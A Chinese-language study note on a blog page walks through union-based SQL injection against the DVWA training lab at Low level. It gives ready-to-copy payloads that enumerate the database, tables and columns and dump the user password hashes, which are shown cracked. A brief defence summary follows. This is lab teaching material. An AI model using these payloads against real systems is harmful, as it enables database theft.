DVWA SQL Injection(Low)完整实战|SQL 联合注入学习笔记
一、什么是 SQL 注入SQL 注入 (SQL Injection)Web 程序直接把用户可控输入拼接到 SQL 语句中执行攻击者通过构造特殊输入改变原有 SQL 逻辑非法查询、修改数据库数据属于 OWASP Top10 高危漏洞。简单理解后台 SQL 语句直接拼接前端传入的参数没有做过滤攻击者输入单引号、注释符等符号闭合原有 SQL 语法拼接恶意查询语句实现脱库。DVWA‑Low 级别没有任何过滤直接将 UserID 参数拼入 SQL适合入门学习联合查询 Union 注入。二、漏洞环境靶场DVWA SQL‑Injection 安全等级Low本地环境PHPStudyMySQL5.7漏洞页面User ID输入框传入 id 参数查询用户姓名后端源码核心逻辑Lowphp运行$query SELECT first_name, last_name FROM users WHERE user_id $id;;三、完整解题思路步骤 1判断是否存在注入输入1页面报错说明单引号破坏 SQL 语法确认字符型单引号闭合注入。输入1 # 页面恢复正常#是 MySQL 注释符注释掉后面剩余 SQL 语句。步骤 2order by 判断查询字段数量order by n用来探测查询返回多少列报错代表列数不足。1 order by 1# 正常1 order by 2# 正常1 order by 3# 报错得出查询结果一共2 列后续 union select 必须写 2 个字段。步骤 3判断回显位置确定哪一列可以输出数据联合注入语法前面查询条件为假只执行 union 后面恶意 SQLpayloadplaintext-1 union select 1,2#First name 位置回显1Surname 位置回显2第 1、2 列都存在回显点可以用来输出数据库查询结果。‑1让前面 where 条件不成立原查询返回空页面只展示 union 注入结果。步骤 4获取当前数据库名称plaintext-1 union select 1,database()#得到数据库名dvwa步骤 5爆出 dvwa 库下所有表名⚠️本地 PHPStudy MySQL5.7 注意查询information_schema系统库会报字符集 / 校对集冲突必须使用 convert 转换字符集否则页面空白报错。plaintext-1 union select 1,convert(table_name using utf8mb4) from information_schema.tables where table_schemadvwa#获取到表名users存储账号密码。步骤 6爆出 users 表所有字段名plaintext-1 union select 1,convert(column_name using utf8mb4) from information_schema.columns where table_schemadvwa and table_nameusers#得到关键字段user、password存储用户名和 MD5 加密密码。步骤 7脱库读取账号密码两种方式limit 逐行爆适合学习一次读取一条记录group_concat 一次性导出全部数据方式① limit 逐行读取plaintext-1 union select user,password from users limit 0,1#-1 union select user,password from users limit 1,1#-1 union select user,password from users limit 2,1#-1 union select user,password from users limit 3,1#-1 union select user,password from users limit 4,1#limit offset,countoffset 为偏移量从 0 开始count 读取记录条数。方式② group_concat 一次性导出全部账号密码plaintext-1 union select 1,convert(group_concat(user,0x7c,password separator 0x3b) using utf8mb4) from users#0x7c是|、0x3b是;十六进制分隔符不需要引号。拿到 MD5 哈希后在线 MD5 解密得到明文密码。四、本地环境完整可复现 Payload 合集直接复制使用重点查询 information_schema 系统库时必须加 convert (xxx using utf8mb4)直接查询业务 users 表不需要 convertsql-- 1.判断注入点1 #-- 2.order by 判断列数1 order by 2#1 order by 3#--3.寻找回显位-1 union select 1,2#--4.查询当前数据库名-1 union select 1,database()#--5.查dvwa库所有表名本地MySQL5.7必须加convert-1 union select 1,convert(table_name using utf8mb4) from information_schema.tables where table_schemadvwa#--6.查users表字段-1 union select 1,convert(column_name using utf8mb4) from information_schema.columns where table_schemadvwa and table_nameusers#--7‑1 limit逐行脱账号密码查业务表不需要convert-1 union select user,password from users limit 0,1#-1 union select user,password from users limit 1,1#-1 union select user,password from users limit 2,1#-1 union select user,password from users limit 3,1#-1 union select user,password from users limit 4,1#--7‑2 group_concat一次性导出全部数据-1 union select 1,convert(group_concat(user,0x7c,password separator 0x3b) using utf8mb4) from users#五、复现结果users 表账号密码汇总表格用户名 MD5 哈希 明文密码admin 5f4dcc3b5aa765d61d8327deb882cf99 passwordgordonb e99a18c428cb38d5f260853678922e03 abc1231337 8d3533d75ae2c3966d7e0d4fcc69216b charleypablo 21232f297a57a5a743894a0e4a801fc3 letmeinsmithy 7a28b96c94eb4a330a7e62b531577c11 password六、知识点总结本案例属于字符型 union 联合查询注入闭合符号为单引号#作为注释。union 注入要求前后两个 select 查询字段数量必须完全一致。-1使前面查询条件不成立页面只输出 union 后面恶意查询的结果。MySQL5.7 环境查询information_schema系统库容易报字符集不匹配解决方案convert(字段 using utf8mb4)。业务表不需要转换。limit offset,num逐行获取数据group_concat()可以拼接多条记录一次性输出。防御思路使用预编译语句 (PDO)拒绝直接拼接用户输入过滤特殊符号最小权限原则。

相关新闻

XXL-JOB v2.5.0 详细使用指南:从零搭建到任务开发

XXL-JOB v2.5.0 详细使用指南:从零搭建到任务开发

XXL-JOB 是一个轻量级分布式任务调度平台,核心设计是调度中心(Admin) 与执行器(Executor) 分离:调度中心负责任务的管理和触发,执行器负责接收调度请求并执行业务代码。下面从零开始&#xff0c…

2026/8/11 2:52:11 阅读更多 →
抖音下载器完全指南:如何免费批量下载抖音视频、直播回放和作者主页

抖音下载器完全指南:如何免费批量下载抖音视频、直播回放和作者主页

抖音下载器完全指南:如何免费批量下载抖音视频、直播回放和作者主页 【免费下载链接】douyin-downloader A practical Douyin downloader for both single-item and profile batch downloads, with progress display, retries, SQLite deduplication, and browser f…

2026/8/11 2:52:11 阅读更多 →
3分钟解锁专业缠论分析:ChanlunX缠论插件终极免费指南

3分钟解锁专业缠论分析:ChanlunX缠论插件终极免费指南

3分钟解锁专业缠论分析:ChanlunX缠论插件终极免费指南 【免费下载链接】ChanlunX 缠中说禅炒股缠论可视化插件 项目地址: https://gitcode.com/gh_mirrors/ch/ChanlunX 你想在通达信中实现专业的缠论技术分析吗?ChanlunX缠论插件正是你寻找的终极…

2026/8/11 2:52:11 阅读更多 →

最新新闻

光刻显影缺陷:桥连/残留/塌陷的排查

光刻显影缺陷:桥连/残留/塌陷的排查

一、背景故事:ADI缺陷率一夜翻了三倍六月的一个周一早上,光刻区主管脸色铁青地站在晨会白板前:周末两天,KLA扫描的ADI(光刻后检查)缺陷密度从平时的每平方厘米零点一翻到了零点三,而且缺陷类型分…

2026/8/11 3:41:27 阅读更多 →
你的ELISA试剂盒可能在路上就“死”了

你的ELISA试剂盒可能在路上就“死”了

ELISA实验做不出标准曲线,很多人的第一反应是——操作有问题。重新稀释标准品、调整孵育时间、更换洗涤液……折腾一圈,结果还是不行。很少有人会去查:这批试剂盒在运输途中,温度到底有没有达标?ELISA试剂盒的核心成分…

2026/8/11 3:41:27 阅读更多 →
OpenAI暂停Astra开发:AI智能体网络安全能力引发的安全边界思考

OpenAI暂停Astra开发:AI智能体网络安全能力引发的安全边界思考

这次我们来看一个近期在AI和网络安全领域引发高度关注的事件:OpenAI暂停了其下一代AI模型Astra的开发。根据多方信息,暂停的核心原因并非技术瓶颈,而是该模型在内部测试中展现出了超出预期的“关键”网络安全能力,这引发了团队对潜…

2026/8/11 3:41:27 阅读更多 →
ChatMemory三大策略解析:解决LLM对话上下文丢失的工程实践

ChatMemory三大策略解析:解决LLM对话上下文丢失的工程实践

1. 从一次“失忆”的线上事故说起上周,我们团队负责的一个智能客服Agent在生产环境闹了个不大不小的笑话。一个用户连续咨询了同一个订单的物流状态和退货政策,前后间隔不过五分钟,Agent在第二次对话时,竟然像第一次见面一样&…

2026/8/11 3:41:27 阅读更多 →
毕业季论文降重工具实测与技巧指南

毕业季论文降重工具实测与技巧指南

1. 毕业季论文降重神器横评指南又到一年毕业季,论文查重成了无数学生的噩梦。去年帮表弟改论文时,我亲眼见证了他从查重率38%降到5%的艰难历程。如今AI改写工具层出不穷,但质量参差不齐,选错工具可能让你的论文从"学术作品&q…

2026/8/11 3:41:27 阅读更多 →
告别手动输入!首助编辑高手“自动粘贴”上线,一键搞定邮政编码

告别手动输入!首助编辑高手“自动粘贴”上线,一键搞定邮政编码

在数字化办公时代,如何从海量数据中高效提取关键信息,是提升团队生产力的关键。为了给您提供更便捷、智能的编辑体验,“首助编辑高手”全新上线“自动粘贴文本”功能。该功能旨在通过自动化规则配置,替代传统繁琐的手动操作&#…

2026/8/11 3:40:27 阅读更多 →

日新闻

如何用Video2X实现专业级视频画质提升:AI视频增强完整指南

如何用Video2X实现专业级视频画质提升:AI视频增强完整指南

如何用Video2X实现专业级视频画质提升:AI视频增强完整指南 【免费下载链接】video2x A machine learning-based video super resolution and frame interpolation framework. Est. Hack the Valley II, 2018. 项目地址: https://gitcode.com/GitHub_Trending/vi/v…

2026/8/11 0:00:02 阅读更多 →
前后端分离项目中控制台与接口工具数据差异排查指南

前后端分离项目中控制台与接口工具数据差异排查指南

1. 问题现象解析:控制台与Apifox的数据差异 最近在调试一个前后端分离项目时,遇到了一个典型问题:后端服务在本地开发环境控制台能正常输出查询数据,但通过Apifox测试时却返回空结果。这种"控制台有数据,接口工具…

2026/8/11 0:00:03 阅读更多 →
AI编程实战:从Claude Code踩坑到游戏开发入门

AI编程实战:从Claude Code踩坑到游戏开发入门

1. 从“AI能帮我做游戏”到“AI让我重新学编程”最近身边不少朋友,尤其是一些非技术背景、但对游戏开发有浓厚兴趣的朋友,都在问我同一个问题:“听说现在用Claude Code这种AI编程工具,小白也能做游戏了,是真的吗&#…

2026/8/11 0:00:03 阅读更多 →

周新闻

5分钟告别提取码焦虑:baidupankey如何智能破解百度网盘资源锁

5分钟告别提取码焦虑:baidupankey如何智能破解百度网盘资源锁

5分钟告别提取码焦虑:baidupankey如何智能破解百度网盘资源锁 【免费下载链接】baidupankey 在线查询网盘提取码(维护中 rm repo) 项目地址: https://gitcode.com/gh_mirrors/ba/baidupankey 你是否曾经在深夜寻找一份重要资料&#x…

2026/8/11 1:08:05 阅读更多 →
如何快速生成中国车牌图片:Python开源工具完整指南

如何快速生成中国车牌图片:Python开源工具完整指南

如何快速生成中国车牌图片:Python开源工具完整指南 【免费下载链接】chinese_license_plate_generator 中国车牌生成器 项目地址: https://gitcode.com/gh_mirrors/ch/chinese_license_plate_generator 中国车牌生成器是一个基于Python的开源项目&#xff0c…

2026/8/11 1:08:05 阅读更多 →
收藏!小白程序员轻松入门大模型,从Harness工程开始实践

收藏!小白程序员轻松入门大模型,从Harness工程开始实践

文章强调学习大模型不应只关注模型本身,而应重视模型外的系统搭建,即Harness。提出AgentModelHarness的实用公式,详细介绍Harness的四个层次:持久化层、执行层、控制层和观察与验证层。文章还探讨了上下文工程、工具设计、AGENTS.…

2026/8/11 1:08:05 阅读更多 →

月新闻

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南

免费解锁百度网盘SVIP加速:macOS用户必备的下载提速终极指南 【免费下载链接】BaiduNetdiskPlugin-macOS For macOS.百度网盘 破解SVIP、下载速度限制~ 项目地址: https://gitcode.com/gh_mirrors/ba/BaiduNetdiskPlugin-macOS 还在为百度网盘macOS版的龟速下…

2026/8/10 17:07:33 阅读更多 →
终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换

终极ncmdump指南:3分钟实现网易云NCM音乐解密与格式转换 【免费下载链接】ncmdump 项目地址: https://gitcode.com/gh_mirrors/ncmd/ncmdump 还在为网易云音乐下载的NCM格式文件无法在其他播放器播放而烦恼吗?ncmdump解密工具帮你轻松解决这个困…

2026/8/11 1:08:06 阅读更多 →
HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

HarmonyOS 应用开发《掌上英语》第81篇: 智能体卡片:为英语学习 App 打造桌面级学习助手

AgentCard 智能体卡片:为英语学习 App 打造桌面级学习助手适用平台:HarmonyOS 7.0 (API 26 Beta)一、引言 HarmonyOS 7.0(API 26 Beta)新增了 AgentCard 智能体卡片能力,这是继 HMAF(鸿蒙智能体框架&#x…

2026/8/10 17:07:33 阅读更多 →